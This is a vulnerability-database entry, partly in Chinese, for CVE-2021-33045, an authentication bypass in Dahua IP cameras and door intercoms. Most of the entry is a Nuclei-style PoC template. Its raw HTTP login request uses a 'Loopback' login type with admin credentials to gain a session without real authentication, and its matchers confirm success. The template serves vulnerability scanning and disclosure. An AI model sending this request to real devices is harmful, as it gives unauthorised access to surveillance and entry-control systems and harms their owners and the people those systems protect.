CVE-2021-33045: Dahua IPC/VTH/VTO - Authentication Bypass

日期: 2025-08-01 | 影响软件: Dahua IPC VTH VTO | POC: 已公开

漏洞描述

The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.

PoC代码[已公开]

id: CVE-2021-33045

info:
  name: Dahua IPC/VTH/VTO - Authentication Bypass
  author: phantomowl
  severity: critical
  description: |
    The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
  reference:
    - https://seclists.org/fulldisclosure/2021/Oct/13
    - https://www.dahuasecurity.com/aboutUs/trustedCenter/details/582
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-33045
    cwe-id: CWE-287
    epss-score: 0.94124
    epss-percentile: 0.99904
    cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dahuasecurity
    product: ipc-hum7xxx_firmware
  tags: cve,cve2021,dahua,auth-bypass,seclists,kev

http:
  - raw:
      - |
        POST /RPC2_Login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "method": "global.login",
          "params": {
            "userName": "admin",
            "ipAddr": "127.0.0.1",
            "loginType": "Loopback",
            "clientType": "Local",
            "authorityType": "Default",
            "passwordType": "Plain",
            "password": "admin"
          },
          "id": 1,
          "session": 0
        }


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"session":'
          - '"result":true'
          - '"keepAliveInterval":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022039fc74d2cd034da667cae9d5533aa1dec26d1b073338c8ece169777b92629324022100cd6bb2ef239e5f9e1ba3501d619192835bde4eb5f87694f1f0a12bd9aff025df:922c64590222798bb761d5b6d8e72950

相关漏洞推荐